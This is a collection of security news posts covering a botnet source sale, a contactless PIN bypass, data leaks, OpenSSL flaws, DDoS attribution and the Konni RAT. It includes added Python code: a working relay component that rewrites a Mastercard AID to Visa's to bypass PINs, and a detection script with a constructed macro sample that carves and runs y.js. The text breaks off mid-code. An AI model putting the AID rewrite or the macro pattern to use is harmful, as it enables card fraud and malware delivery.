
Phorpiex botnet shuts down and authors put source code for sale

28 August 2021 at 08:48

Crooks behind the Phorpiex botnet have shut down their operations and put the source code for sale on the dark web.

The criminal organization behind the Phorpiex botnet has shut down its operations and put the source code of the bot up for sale on a cybercrime forum hosted on the dark web.

The news was reported by The Record after experts from security firm Cyjax noticed an ad posted by an individual who had been involved in the botnet’s operation in the past.

The decision to sell the source code follows the departure of the malware’s two original authors from the operation.

“‘As I no longer work and my friend has left the biz, I’m here to offer Trik (name from coder) / Phorpiex (name for AV firms) source for sell [sic],’ the individual said today in a forum post spotted by British security firm Cyjax.” reads the report published by The Record.

The source code for the Phorpiex botnet is being sold on the darknet…👀 pic.twitter.com/GxBsnUacvh

— Cyjax (@Cyjax_Ltd) August 27, 2021

The main bot and all modules are written in C++; the seller claims that neither the bot nor its modules trigger any firewall or UAC prompts, and that the bot works on both 32-bit and 64-bit systems.

The Record, with the help of Check Point malware researcher Alexey Bukhteyev, confirmed that the ad is genuine.

The researchers also confirmed that the source code of the bot has not been sold before.

Bukhteyev pointed out that even though the botnet’s C&C servers are down, whoever buys the code will be able to set up new ones and take control of the previously infected systems.

At the time of this writing, it is not clear how many infected machines are still active.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Phorpiex botnet)

The post Phorpiex botnet shuts down and authors put source code for sale appeared first on Security Affairs.

Boffins show PIN bypass attack on Mastercard and Maestro contactless payments

28 August 2021 at 16:07

Boffins from the Swiss university ETH Zurich demonstrated a PIN bypass attack on contactless cards from Mastercard and Maestro.

A group of researchers from the Swiss ETH Zurich university has discovered a vulnerability that allowed them to bypass PIN codes on contactless cards from Mastercard and Maestro.

Technically the researchers performed a Man-in-the-Middle (MitM) attack between a stolen card and the merchant’s Point-of-Sale (PoS) terminal.

In a real attack scenario, crooks could use a victim’s contactless card to make expensive purchases without knowing the card’s PIN.

“Concretely, the attacker fools the terminal into believing that the card being used is a Visa card and then applies the recent PIN bypass attack that we reported on Visa.” state the researchers. “We have built an Android application and successfully used it to carry out this attack for transactions with both Mastercard debit and credit cards, including a transaction for over 400 USD with a Maestro debit card. Finally, we extend our formal model of the EMV contactless protocol to machine-check fixes to the issues found.”

The attack was implemented using two Android smartphones (supporting NFC and running Android 4.4 KitKat or later) connected through a relay channel built on TCP/IP server-client communication over WiFi. One phone runs the researchers’ app in POS Emulator mode and the other runs it in Card Emulator mode. The device running in Card Emulator mode must support Android’s host-based card emulation so that the phone can launch the NFC payment service implemented by the app. The man-in-the-middle functionality runs on the POS Emulator device, while the Card Emulator acts as the proxy for the relay channel.

The attack scenario is simple: the attackers hold the PoS emulator device near the victim’s card to make it start a transaction and capture its responses, while the card emulator is presented to a real PoS terminal inside a store and feeds it the modified transaction data.

[Figure from the paper] Setup of the testing environment for the proof-of-concept implementation, displaying the following devices: (1) SumUp Plus Card Reader, (2) mobile phone running the SumUp app and connected over Bluetooth to the SumUp reader, (3) Android phone running the researchers’ app in Card Emulator mode, (4) Android phone running the app in POS Emulator mode, and (5) contactless card. Device (2) is not part of the attacker’s equipment, since in an actual store this device and (1) would be the payment terminal. In this scenario, devices (3) and (4) would be the attacker’s equipment and (5) the victim’s card.

The same team of researchers devised a method to bypass PINs on Visa contactless payments last year and reused it as the second stage of this new attack: the first stage fools the terminal into believing that the card being used is a Visa rather than a Mastercard or Maestro card.

Last year the researchers successfully tested that Visa attack with Visa Credit, Visa Debit, Visa Electron, and V Pay cards, completing transactions above the amount at which Swiss banks require a PIN.

Below is one of the slides prepared by the researchers to show the PIN bypass attack:

[Slide: Maestro PIN bypass]

The store’s PoS operator cannot detect the attack: from their perspective the customer is paying with a mobile payment app, while in reality the crook is relaying modified transaction data from a stolen card.

Unlike the attack against Visa cards, the new PIN bypass first tricks the PoS terminal into thinking that the incoming transaction comes from a Visa card rather than a Mastercard/Maestro one: the researchers replaced the card’s legitimate Application Identifier (AID) with Visa’s AID, A0000000031010, in the data relayed to the terminal, so the terminal runs its Visa kernel against a non-Visa card.

The experts then applied the 2020 Visa attack to complete the payment without providing a PIN.
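To make the AID swap concrete, here is an added example (not code from the ETH Zurich researchers’ app) of what the relay’s man-in-the-middle component has to do to the card’s PPSE response before forwarding it to the terminal: parse the BER-TLV file control information, find the 4F (AID) entries and replace the card’s AID with the Visa AID named above. The sample PPSE response is constructed for this example; the Mastercard AID A0000000041010 used as the victim card’s AID is the standard Mastercard credit/debit AID and is not mentioned in the article. A real relay would also have to handle the terminal’s subsequent SELECT of the Visa AID and the Visa kernel’s command flow, which the 2020 Visa attack covers and which this snippet does not show.

```python
# Added example (not the ETH Zurich researchers' code): rewriting the AID a
# contactless card advertises in its PPSE response, as a relay MitM would do
# to make a terminal treat a Mastercard/Maestro card as a Visa card.

VISA_AID = bytes.fromhex("A0000000031010")        # Visa AID quoted in the article
MASTERCARD_AID = bytes.fromhex("A0000000041010")  # assumed victim-card AID (standard Mastercard credit/debit AID)

# EMV constructed tags whose value is itself a list of TLV objects
TEMPLATE_TAGS = {0x6F, 0xA5, 0xBF0C, 0x61, 0x70, 0x77}


def parse_tlv(data: bytes) -> list:
    """Parse a BER-TLV byte string into a list of (tag, value) pairs."""
    items, i = [], 0
    while i < len(data):
        tag = data[i]
        i += 1
        if tag & 0x1F == 0x1F:            # multi-byte tag: continue while bit 8 of each byte is set
            while True:
                b = data[i]
                i += 1
                tag = (tag << 8) | b
                if not b & 0x80:
                    break
        length = data[i]
        i += 1
        if length & 0x80:                 # long form: low 7 bits give the number of length bytes
            n = length & 0x7F
            length = int.from_bytes(data[i:i + n], "big")
            i += n
        items.append((tag, bytes(data[i:i + length])))
        i += length
    return items


def encode_tlv(items) -> bytes:
    """Serialize (tag, value) pairs back to BER-TLV, recomputing every length field."""
    out = b""
    for tag, value in items:
        out += tag.to_bytes((tag.bit_length() + 7) // 8, "big")
        n = len(value)
        if n < 0x80:
            out += bytes([n])
        else:
            lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
            out += bytes([0x80 | len(lb)]) + lb
        out += value
    return out


def rewrite_aid(data: bytes, old_aid: bytes, new_aid: bytes) -> bytes:
    """Return data with every 4F (AID) entry equal to old_aid replaced by new_aid,
    descending into nested templates (6F / A5 / BF0C / 61)."""
    out = []
    for tag, value in parse_tlv(data):
        if tag == 0x4F and value == old_aid:
            value = new_aid
        elif tag in TEMPLATE_TAGS:
            value = rewrite_aid(value, old_aid, new_aid)
        out.append((tag, value))
    return encode_tlv(out)


def advertised_aids(data: bytes) -> list:
    """Collect the AIDs a PPSE/FCI response advertises, in order."""
    found = []
    for tag, value in parse_tlv(data):
        if tag == 0x4F:
            found.append(value)
        elif tag in TEMPLATE_TAGS:
            found.extend(advertised_aids(value))
    return found


def build_ppse_fci(aid: bytes, label: bytes) -> bytes:
    """Constructed PPSE SELECT response:
    6F { 84 '2PAY.SYS.DDF01', A5 { BF0C { 61 { 4F aid, 50 label, 87 priority } } } }"""
    entry = encode_tlv([(0x4F, aid), (0x50, label), (0x87, b"\x01")])
    return encode_tlv([(0x6F, encode_tlv([
        (0x84, b"2PAY.SYS.DDF01"),
        (0xA5, encode_tlv([(0xBF0C, encode_tlv([(0x61, entry)]))])),
    ]))])


# Constructed response from a Mastercard card, and what the terminal sees after the MitM.
CARD_RESPONSE = build_ppse_fci(MASTERCARD_AID, b"MASTERCARD")
TERMINAL_SEES = rewrite_aid(CARD_RESPONSE, MASTERCARD_AID, VISA_AID)

if __name__ == "__main__":
    print("card advertises  :", [a.hex().upper() for a in advertised_aids(CARD_RESPONSE)])
    print("terminal receives:", [a.hex().upper() for a in advertised_aids(TERMINAL_SEES)])
```

Because both AIDs are seven bytes long, the rewritten response has the same length as the original; the encoder nonetheless recomputes every length field, so the same routine would cope with AIDs of different lengths. The countermeasure the researchers propose, having the issuer check that the kernel the terminal reports matches the card brand, is exactly the check that this rewrite defeats when it is absent.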

The researchers published a video PoC of the attack:

The researchers successfully tested this attack with Mastercard Credit and Maestro cards. They also tried to pay with a Mastercard card presented as a Discover card and as a UnionPay card, since those two kernels are similar to the Visa kernel, but those attempts failed.

Mastercard already addressed the issue earlier this year, while Visa has yet to fix its PIN bypass bug.


EskyFun data leak, over 1 million Android gamers impacted

28 August 2021 at 22:32

vpnMentor’s researchers reported that the Chinese mobile gaming company EskyFun suffered a data breach, over 1 million gamers impacted. 

vpnMentor’s researchers discovered that the Chinese mobile gaming company EskyFun suffered a data breach: information on over 1 million gamers was exposed on an unsecured server.

EskyFun developed several Android games including Rainbow Story: Fantasy MMORPG, Adventure Story, The Legend of the Three Kingdoms, and Metamorph M. The games affected in the data leak were: Rainbow Story: Fantasy MMORPG (500,000+ downloads); Metamorph M (100,000+ downloads); Dynasty Heroes: Legends of Samkok (1,000,000+ downloads).

“EskyFun’s server was storing a rolling log of the previous 7 days’ user records from 3 separate games. At the end of each day, any data older than 7 days was automatically deleted to make room for fresh data.” reads the report published by the researchers. “As a result, our investigation focuses on just 7 days’ worth of data and any players exposed in that short window. However, despite only covering 7 days, the server still contained over 360 million records from players. This is an enormous amount of data collected from a few small, not well-known mobile games.”

On Thursday, the team said that users of the following games were involved in the data leak: Rainbow Story: Fantasy MMORPG, Metamorph M, and Dynasty Heroes: Legends of Samkok. Together, they account for over 1.6 million downloads.

The experts pointed out that the gaming firm uses “aggressive and deeply troubling tracking, analytics, and permissions settings” collecting an impressive amount of data when users install their games.

vpnMentor reported that the server contained 134 GB of data; the exposed records include:

  • IP address
  • IMEI number
  • Mobile application package doing the tracking
  • Device screen size
  • Whether the device is ‘rooted’
  • Device model
  • Phone number (if any)
  • Platform (Android/iOS)
  • NetType (WiFi or cellular)
  • Events (open, login, level_up, etc.)


The experts attempted to report their discovery to the gaming firm but received no response, so they also contacted the Hong Kong CERT to get the data secured. The good news is that EskyFun secured the server on July 28.

“If you’re a player on any of EskyFun’s games and are concerned about how this breach might impact you, contact the company directly to determine what steps it’s taking to protect your data.” concludes vpnMentor.


Some Synology products impacted by recently disclosed OpenSSL flaws

29 August 2021 at 07:01

Taiwanese vendor Synology announced that the recently disclosed OpenSSL vulnerabilities CVE-2021-3711 and CVE-2021-3712 impact some of its products.

Taiwanese company Synology revealed that the recently disclosed remote code execution (RCE) and denial-of-service (DoS) OpenSSL vulnerabilities (CVE-2021-3711 and CVE-2021-3712) impact some of its products.

“Multiple vulnerabilities allow remote attackers to conduct denial-of-service attack or possibly execute arbitrary code via a susceptible version of Synology DiskStation Manager (DSM), Synology Router Manager (SRM), VPN Plus Server or VPN Server.” reads the advisory published by the company.

The affected Synology products are:

Product          Severity   Fixed Release Availability
DSM 7.0          Important  Ongoing
DSM 6.2          Moderate   Ongoing
DSM UC           Moderate   Ongoing
SkyNAS           Moderate   Pending
VS960HD          Moderate   Pending
SRM 1.2          Moderate   Ongoing
VPN Plus Server  Important  Ongoing
VPN Server       Moderate   Ongoing

CVE-2021-3711 is a high-severity buffer overflow in the decryption of SM2-encrypted data. Code that follows OpenSSL’s usual two-call pattern (one call to learn the required buffer size, a second call to decrypt) can be handed a size estimate that is too small, and the second call then writes up to 62 bytes past the end of the buffer. An attacker who can present crafted SM2 content could use this to change an application’s behavior or crash it; what can be achieved depends on the targeted application and on the data (e.g. credentials) it holds in the heap when the issue is exploited.

CVE-2021-3712 is a medium-severity read buffer overrun: several OpenSSL functions assume that an ASN1_STRING is NUL-terminated, which is not guaranteed for strings constructed by applications, so crafted ASN.1 input such as a certificate can make OpenSSL read past the end of a buffer. Attackers could exploit it to trigger a denial-of-service (DoS) condition, and the flaw could also result in the disclosure of private memory contents (such as private keys or sensitive plaintext).

Synology is expected to address both flaws with security updates, but it has not provided an estimated timeline for their release. Synology said it is not aware of in-the-wild attacks exploiting the above vulnerabilities.
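A practitioner’s first question on reading an advisory like this is whether the OpenSSL on a given host still carries these bugs. The following added example (not Synology’s or OpenSSL’s code) parses the banner printed by `openssl version` and reports which of the two CVEs the public OpenSSL release line is affected by, using the fact that 1.1.1l was the first 1.1.1 release carrying both fixes. Caveat: vendor builds that backport fixes without bumping the version string (common on Linux distributions and in appliance firmware such as DSM) will be reported as affected, so for those the vendor advisory, not the version string, is authoritative. The `local_openssl_banner` helper assumes an `openssl` binary on PATH.

```python
# Added example (not Synology's or OpenSSL's code): decide from an
# "openssl version" banner whether a build still carries CVE-2021-3711/3712.
import re
import subprocess

FIXED_111 = "l"   # OpenSSL 1.1.1l (24 Aug 2021) is the first 1.1.1 release with both fixes


def parse_openssl_version(banner: str):
    """'OpenSSL 1.1.1k  25 Mar 2021' -> (1, 1, 1, 'k'); None if the banner is not OpenSSL."""
    m = re.search(r"\bOpenSSL\s+(\d+)\.(\d+)\.(\d+)([a-z]*)", banner)
    if not m:
        return None
    major, minor, patch, letter = m.groups()
    return int(major), int(minor), int(patch), letter


def affected_cves(banner: str) -> list:
    """CVEs the given public OpenSSL release line is affected by, judged by version string only.
    Backported vendor fixes that keep the old version string are NOT detected."""
    v = parse_openssl_version(banner)
    if v is None:
        raise ValueError(f"not an OpenSSL banner: {banner!r}")
    major, minor, patch, letter = v
    if (major, minor, patch) == (1, 1, 1):
        # plain '1.1.1' (empty letter) and 'a'..'k' sort before 'l'
        return ["CVE-2021-3711", "CVE-2021-3712"] if letter < FIXED_111 else []
    if (major, minor, patch) < (1, 1, 1):
        # SM2 decryption (CVE-2021-3711) only exists from 1.1.1, but the ASN.1 read
        # overrun (CVE-2021-3712) is older: 1.0.2 was fixed only in the premium-support
        # 1.0.2za, and 1.1.0 is end-of-life, so both are treated as affected here (assumption).
        return ["CVE-2021-3712"]
    return []   # 3.0.0 shipped after these fixes


def local_openssl_banner() -> str:
    """Assumption: an `openssl` binary is on PATH."""
    return subprocess.run(["openssl", "version"], capture_output=True,
                          text=True, check=True).stdout.strip()


if __name__ == "__main__":
    banner = local_openssl_banner()
    print(banner, "->", affected_cves(banner) or "not affected by CVE-2021-3711/3712 per version string")
```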

Recently the vendor also published another advisory to warn of vulnerabilities in DiskStation Manager.

“Multiple vulnerabilities allow remote authenticated users to execute arbitrary commands, or remote attackers to write arbitrary files via a susceptible version of DiskStation Manager (DSM).” reads the advisory published by the company.

Below is the list of affected products:

Product   Severity   Fixed Release Availability
DSM 7.0   Important  Ongoing
DSM 6.2   Important  Upgrade to 6.2.4-25556-2 or above.
DSM UC    Moderate   Pending
SkyNAS    Important  Pending
VS960HD   Moderate   Pending

Earlier this month, the company’s PSIRT warned customers that the StealthWorker botnet was conducting brute-force attacks against Synology devices in an attempt to plant ransomware. Once a device is compromised, the threat actors enlist it in the botnet, which is used in further attacks aimed at Linux systems, including Synology NAS devices.


DDoS attacks target the Philippine human rights alliance Karapatan

29 August 2021 at 07:44

The Philippine human rights alliance Karapatan has suffered a massive and prolonged Distributed Denial of Service (DDoS) attack, which the Qurium Media Foundation has linked to the Philippine government.

For the past three weeks, the Philippine human rights alliance Karapatan has suffered a heavy and sustained DDoS attack. The attack comes only a month after the waves of DDoS attacks targeting the alternative media outlets Bulatlat and Altermidya, which Qurium could link to infrastructure controlled by the Philippine government and army.

The DDoS attacks are taking place amid the online solidarity campaign #StopTheKillingsPH co-hosted by Karapatan, which marks one year since human rights organizations and advocates across the world called for an end to the killings in the Philippines and for the prosecution of President Rodrigo Duterte for his crimes against the Filipino people. The event also marks one year since the killing of human rights worker Zara Alvarez, who was an active member of Karapatan.

[Figure: high-level overview of traffic to Karapatan during the attack]

Karapatan Secretary General Cristina Palabay states: “These new series of cowardly cyber attacks against our website were obviously made to prevent the public from accessing our reports on the worsening state of human rights in the Philippines — and we know whose interests these attacks serve.”

In the spirit of changing the landscape of commercial denial-of-service mitigation services, where forensics knowledge is kept private, Qurium has decided to disclose how we fingerprinted and mitigated the DDoS attacks, with the hope that other organizations can learn from our experience, and in solidarity with human rights organizations and independent media that do not have the resources to mitigate and attribute targeted attacks.

Qurium’s forensics report reveals that the attack is proxied via 30,000 bots distributed in Russia, Ukraine, Indonesia and China. The attacker has modified the attack strategy a number of times during the past weeks, which illustrates his dedication to the task. However, Karapatan has not suffered any downtime during the heavy attacks and the website operates as normal.

Qurium’s forensics report compiles the technical findings about the infrastructure and techniques used to launch the attacks against Karapatan.

Qurium forensics report:
Human rights alliance ‘Karapatan’ under long lasting DDoS attack

About the author: Qurium Media Foundation is a Swedish non-profit digital security solutions provider, supporting independent media and human rights organizations in repressive regimes. Learn more at qurium.org or Twitter.


Security Affairs newsletter Round 329

29 August 2021 at 08:19

A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs, free in your inbox.

If you want to also receive for free the international press subscribe here.

EskyFun data leak, over 1 million Android gamers impacted
Boffins show PIN bypass attack Mastercard and Maestro contactless payments
Phorpiex botnet shuts down and authors put source code for sale
Atlassian released security patches to fix a critical flaw in Confluence
An RCE in Annke video surveillance product allows hacking the device
ChaosDB, a Critical Cosmos DB flaw affected thousands of Microsoft Azure Customers
The FBI issued a flash alert for Hive ransomware operations
Victims of Ragnarok ransomware can decrypt their files for free
B. Braun Infusomat pumps could be hacked to alter medication doses
CISA publishes malware analysis reports on samples targeting Pulse Secure devices
Cisco fixed a critical flaw in Cisco APIC for Nexus 9000 series switches
Kaseya fixed two of the three Kaseya Unitrends zero-days found in July
Personal Data and docs of Swiss town Rolle available on the dark web
VMware addressed 4 High-Severity flaws in vRealize Operations
F5 addressed a flaw in BIG-IP devices rated as critical severity under specific conditions
FIN8 group used a previously undetected Sardonic backdoor in a recent attack
ShinyHunters group claims to have data of 70M AT&T customers
Modified version of Android WhatsApp installs Triada Trojan
Samsung could use a TV Block feature to disable any of its TVs worldwide
CVE-2021-3711 in OpenSSL can allow to change an application’s behavior
New zero-click exploit used to target Bahraini activists’ iPhones with NSO spyware
FBI flash alert warns on OnePercent Group Ransomware attacks
Realtek SDK flaws exploited to deliver Mirai bot variant
CISA recommends immediately patch Exchange ProxyShell flaws
T-Mobile data breach could be worse than initially thought, 54 million customers impacted
Are you using a Sophos UTM appliance? Be sure it is up to date!
LPE zero-day flaw in Razer Synapse allows attackers to take over Windows PCs
Memorial Health System forced to cancel surgeries after ransomware attack
Google discloses unpatched Microsoft WFP Default Rules AppContainer Bypass EoP


1 GB of data belonging to Puma available on Marketo

29 August 2021 at 14:58

The name of the sportswear manufacturer Puma has appeared on Marketo, a dark web marketplace for stolen data; the threat actors claim to have stolen 1 GB of data from the company.

‘Marketo’, an emerging underground marketplace for stolen data reachable over the Tor network, announced the publication of data presumably stolen from the sportswear manufacturer Puma.

The listing on Marketo claims to offer about 1 GB of data stolen from the company, which is being auctioned to the highest bidder.

The cybercriminals behind ‘Marketo’ present themselves as operators of an organized ‘marketplace of stolen data’ rather than as a typical ransomware group that disrupts IT operations by locking the victim’s network and encrypting the files on its storage systems.

One of Marketo’s distinctive features is the ability to ‘bid’ on stolen data, which creates competition between the parties interested in acquiring it, including the victim itself.

At the time of this writing, 157 parties had placed bids for the sensitive data.

Some of the files stolen from Puma have been published on Marketo; most of them contain source code of internal management applications, potentially linked to the company’s Product Management Portal.

This data could be used by threat actors to orchestrate a more sophisticated attack against the company.

Experts who analyzed the code found indications that the files might have been stolen through a data breach at a third-party software provider.


New variant of Konni RAT used in a campaign that targeted Russia

30 August 2021 at 06:50

So far, Konni RAT has managed to evade detection as only 3 security solutions on VirusTotal were able to detect the malware.

Security researchers at Malwarebytes Labs have uncovered an ongoing malware campaign that is mainly targeting Russia with the Konni RAT.

The Konni RAT was first documented by Cisco Talos researchers in 2017; it had gone undetected since 2014 and was employed in highly targeted attacks. The RAT avoided detection through continuous evolution, and it is capable of executing arbitrary code on the target systems and stealing data.

The Konni RAT has been attributed to North Korea-linked threat actors tracked as Thallium and APT37.

Malwarebytes experts discovered two weaponized documents written in the Russian language, one using the trade and economic issues between Russia and the Korean Peninsula as a lure. The second document used a meeting of the intergovernmental Russian-Mongolian commission as a lure.

Once the victim enables macros, the infection chain starts and deploys a new, heavily obfuscated variant of Konni RAT.

“These malicious documents used by Konni APT have been weaponized with the same simple but clever macro. It just uses a Shell function to execute a one-liner cmd command. This one-liner command gets the current active document as input and looks for the “^var” string using findstr and then writes the content of the line starting from “var” into y.js. At the end it calls the Wscript Shell function to execute the JavaScript file (y.js).” reads the analysis published by Malwarebytes. “The clever part is that the actor tried to hide its malicious JS, which is the start of its main activities, at the end of the document content and did not put it directly into the macro to avoid being detected by AV products as well as hiding its main intent from them.”
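For detection engineers, the macro described above has a distinctive shape: a Shell call that hands the document’s own path to findstr, extracts lines beginning with var, redirects them to a .js file and runs it with wscript. The added example below (not Malwarebytes’ code) encodes those traits as indicators over extracted VBA source (for instance the output of olevba) and separately carves the appended script out of raw document bytes the same way the macro’s findstr does. The VBA snippets and the document bytes are constructed for the example and are not the real Konni samples; the indicator regexes are assumptions about plausible attacker syntax, not signatures of the actual macro.

```python
# Added example (not Malwarebytes' code): triage checks for the
# "carve a script out of the document itself" macro technique.
# All samples below are constructed; they are not the real Konni documents.
import re

# (name, regex over the macro source). The syntax matched is an assumption
# modelled on the behaviour described in the Malwarebytes write-up.
MACRO_INDICATORS = [
    ("shell_exec",     re.compile(r"\bShell\b", re.I)),                                   # Shell(...) / WScript.Shell
    ("findstr_var",    re.compile(r"findstr\b[^&|\r\n]*(\^var|/b\s+\"*var)", re.I)),      # findstr for lines starting with "var"
    ("self_as_input",  re.compile(r"ActiveDocument\.(FullName|Path)", re.I)),             # the document feeds itself to the command
    ("redirect_to_js", re.compile(r">\s*\S*\.js\b", re.I)),                               # output redirected into a .js file
    ("run_js_host",    re.compile(r"\b[wc]script(\.exe)?\b[^\r\n]*\.js\b", re.I)),        # wscript/cscript executing that file
]


def macro_indicators(vba_source: str) -> list:
    """Names of the indicators present in a macro's source, in definition order."""
    return [name for name, rx in MACRO_INDICATORS if rx.search(vba_source)]


def carve_trailing_script(doc_bytes: bytes, marker: bytes = b"var") -> list:
    """Mirror of what the macro's findstr does: return the lines of the raw file that
    start with `marker`. A legitimate Office document should yield none."""
    return [line.decode("latin-1")
            for line in re.split(rb"\r\n|\n", doc_bytes)
            if line.startswith(marker)]


def is_konni_style(vba_source: str, doc_bytes: bytes) -> bool:
    """Flag when the macro carves a script from its own document AND such lines really exist."""
    hits = macro_indicators(vba_source)
    return "findstr_var" in hits and "self_as_input" in hits and bool(carve_trailing_script(doc_bytes))


# --- constructed samples ------------------------------------------------------
SUSPICIOUS_MACRO = (
    'Sub AutoOpen()\n'
    '  Dim cmd As String\n'
    '  cmd = "cmd /c findstr /b ""var"" """ & ActiveDocument.FullName & """ > %TEMP%\\y.js & wscript %TEMP%\\y.js"\n'
    '  Shell cmd, vbHide\n'
    'End Sub\n'
)
BENIGN_MACRO = (
    'Sub FormatTable()\n'
    '  ActiveDocument.Tables(1).Style = "Table Grid"\n'
    'End Sub\n'
)
# OLE header, some "document" content, then a script appended after the real data.
SAMPLE_DOC = (
    b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" + b"\x00" * 64
    + b"Trade and economic relations ... (document text)\r\n"
    + b"var sh = new ActiveXObject('WScript.Shell');\r\n"
    + b"var tmp = sh.ExpandEnvironmentStrings('%TEMP%');\r\n"
)

if __name__ == "__main__":
    print("suspicious macro:", macro_indicators(SUSPICIOUS_MACRO))
    print("benign macro    :", macro_indicators(BENIGN_MACRO))
    print("carved lines    :", carve_trailing_script(SAMPLE_DOC))
    print("konni-style     :", is_konni_style(SUSPICIOUS_MACRO, SAMPLE_DOC))
```

The two checks are deliberately combined: a macro that merely shells out is common in legitimate automation, and a stray line starting with var can occur in a document’s text, but a macro that searches its own file for such lines while the file actually contains them is the specific pattern described above.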


Malware researchers noticed multiple differences between this campaign and previous ones orchestrated by the North Korea-linked APT group, including:

  • The macros are different. In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content.
  • In the new campaign JavaScript files have been used to execute batch and PowerShell files.
  • The new campaign uses PowerShell and URLMON API calls to download the cab file, while in the old campaign it used certutil to download the cab file.
  • The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique.
  • In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration.

Experts observed infections also in other countries, including Japan, Nepal, Mongolia, and Vietnam.

Additional details, including Indicators of Compromise (IoC), are reported in the analysis published by Malwarebytes.


Boston Public Library discloses cyberattack

30 August 2021 at 07:45

The Boston Public Library was the victim of a cyberattack that crippled its computer network, the library revealed in a statement on Friday.

The Boston Public Library announced on Friday that it was hit by a cyberattack that compromised its computer network. The affected systems were taken offline to prevent the threat from spreading. At the time of the announcement, the library said there was no evidence that sensitive employee or patron data had been compromised.

The Boston Public Library is the oldest large municipal library in the United States.

“On Wednesday morning, 8/25, the Boston Public Library experienced a systemwide technical outage due to a cybersecurity attack, pausing public computer and public printing services, as well as some online resources. Affected systems were taken offline immediately, and proactive steps were taken to isolate the problem and shutdown network communication. There is currently no evidence that sensitive employee or patron data has been disclosed.” reads the statement published by BPL.

The library reported the incident to law enforcement and is working with the Mayor’s Department of Innovation and Technology to mitigate the cyberattack. All locations will remain open, patrons will still be able to check out books, and some online services remain operational. 

“We apologize for any inconvenience this outage may have caused patrons,” said Kurt Mansperger, Chief Technology Officer of the BPL. “Thank you for your patience as our team and law enforcement officials work to restore our digital services and protect the library from future attacks.” concludes the statement.


CISA urges enterprises to fix Microsoft Azure Cosmos DB flaw

30 August 2021 at 13:11

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert urging enterprises to address the recently disclosed vulnerability in Microsoft Azure Cosmos DB.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert urging organizations to address the recently disclosed vulnerability in Microsoft Azure Cosmos DB (aka ChaosDB) as soon as possible.

Last week, researchers from cloud security company Wiz disclosed technical details of a now-fixed Azure Cosmos DB vulnerability, dubbed ChaosDB, that could have been exploited by attackers to gain full admin access to other customers’ database instances without any authorization. The flaw was trivial to exploit and affected thousands of organizations worldwide.

“#ChaosDB is an unprecedented critical vulnerability in the Azure cloud platform that allows for remote account takeover of Azure’s flagship database – Cosmos DB. The vulnerability, which was disclosed to Microsoft in August 2021 by Wiz Research Team, gives any Azure user full admin access (read, write, delete) to another customer’s Cosmos DB instances without authorization.” reads the post published by the security firm.

Azure Cosmos DB is Microsoft’s globally distributed, multi-model database service.

Wiz experts identified an exploit that leverages a chain of vulnerabilities in the Jupyter Notebook feature of Cosmos DB that enables an attacker to obtain the credentials corresponding to the target Cosmos DB account, including the Primary Key. These credentials allow users to view, modify, and delete data in the target Cosmos DB account via multiple channels.


Microsoft acknowledged the issue and said that it is not aware of attacks exploiting the vulnerability to access customer data.

“This vulnerability only affects a subset of customers who had the Jupyter Notebook feature enabled. Notifications have been sent to all customers that could be potentially affected due to researcher activity, advising they regenerate their primary read-write key. Other keys including the secondary read-write key, primary read-only key, and secondary read-only key were not vulnerable.” reads the post published by Microsoft, which also includes instructions on how to regenerate the primary read-write key. “If you did not receive an email or in-portal notification, there is no evidence any other external parties had access to your primary read-write account key. If you have diagnostic logs enabled, you can also review the logs for unusual IP addresses. Our suggestion is to enable Diagnostic Logging and Azure Defender where available and periodically rotate your keys.” the post continues.

CISA now urges Azure Cosmos DB customers to roll and regenerate their keys and to review Microsoft’s guidance on how to secure access to data in Azure Cosmos DB.

“CISA is aware of a misconfiguration vulnerability in Microsoft’s Azure Cosmos DB that may have exposed customer data. Although the misconfiguration appears to have been fixed within the Azure cloud, CISA strongly encourages Azure Cosmos DB customers to roll and regenerate their certificate keys and to review Microsoft’s guidance on how to Secure access to data in Azure Cosmos DB.” reads the advisory published by CISA.


Israeli firm ‘Bright Data’ (Luminati Networks) enabled the attacks against Karapatan

30 August 2021 at 13:38

Who is behind the massive and prolonged Distributed Denial of Service (DDoS) attack that hit the Philippine human rights alliance Karapatan?

The 25-day-long DDoS attack against the website of Karapatan was launched from almost 30,000 IP addresses, one third of which originated from devices that were not running “Open Proxies” or “Tor exits”. Identifying this mysterious part of the botnet turned out to be a fascinating research effort and a digital forensics challenge. The traces led us to an Israeli firm offering access to millions of proxies in mobile operators, data centers and residential buildings – a perfect infrastructure to hide the source of DDoS attacks.

This is Part II of our ongoing research on the DDoS attack against Karapatan. For background information, please read the report “Human rights alliance ‘Karapatan’ under long lasting DDoS attack“.


Finding patterns – identifying clusters

Once we were able to flag the addresses associated with the Tor network and those that came from publicly visible proxy services, we classified the 8,000 “unknown” IP addresses in pools based on country, operator, time and attack cluster. We defined an “attack cluster” as the group of IP addresses that flooded the website within a one-hour period with similar requests.

A few patterns showed up quickly. The first was that most of the addresses came from a number of mobile providers in Russia and Ukraine, such as MTS, MegaFon, T2 Mobile, PVimpelCom and Kyivstar.

We also noticed that the IPs were rotating every hour, and blocks of 50 new IPs were launching the same query attack at the same time.

During an attack of this nature it is difficult to find clear patterns without fast data and log processing and ad-hoc tools, but our DNS servers were clearly recording spikes of DNS queries every time the botnet was renewing its IP addresses. We love patterns, and here we found a clear one!

The first finding was that the attackers kept using their “CC-Attack modified python script” generating GET and POST floods to the /resources section of karapatan.org, but instead of using open proxies and the Tor network, they were proxying the attack traffic via a “private proxy network” geo-located in a few countries.
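To show what the hourly clustering described above looks like in practice, here is an added example (not Qurium’s tooling) that parses web-server access log lines in Combined Log Format, groups requests into attack clusters keyed by hour, method and path, and measures how much of each hour’s source-IP pool is new compared with the previous hour, which is the signature of the hourly rotation noted above. The log lines, IP addresses and timestamps are constructed for the example; the /resources path is the one named in the text.

```python
# Added example (not Qurium's tooling): hourly attack clusters and IP rotation
# from access logs. Log lines below are constructed, not from karapatan.org.
import re
from collections import defaultdict
from datetime import datetime

# Combined Log Format: ip ident user [time] "METHOD path proto" status ...
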